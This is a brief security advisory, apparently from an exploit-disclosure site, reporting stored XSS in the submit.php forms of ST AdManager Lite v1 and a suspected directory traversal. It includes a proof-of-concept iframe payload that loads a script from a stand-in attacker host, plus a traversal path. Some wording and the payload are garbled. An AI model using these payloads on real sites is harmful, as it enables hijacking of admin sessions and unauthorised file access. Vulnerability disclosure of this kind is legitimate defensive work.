ST AdManager Lite v1
submit.php input form
submit.php input forms do not correctly sanatize user input before submitting it to be checked by an admin and then published. This in turn to allow a user to execute a XSS attack.
in asan admin and check the article.
PoC: [iframe src=http://evilsite.com/scriptlet.html [
Possible Directory traversal?:
The url below when tested produced a script action blocked msg from PHPSecurex, due to it being installed on the test server. I'll assume /../../../../ must be SecFiltered in mod_security.
ERROR MSG: The requested URL /index.php?id=/../../../../ contains a script or action that has has been deteremined unsafe. It has been disabled to prevent abuse.
This server protected by: SecurePHPx
Apache/1.3.34 Server at www.example.com Port 80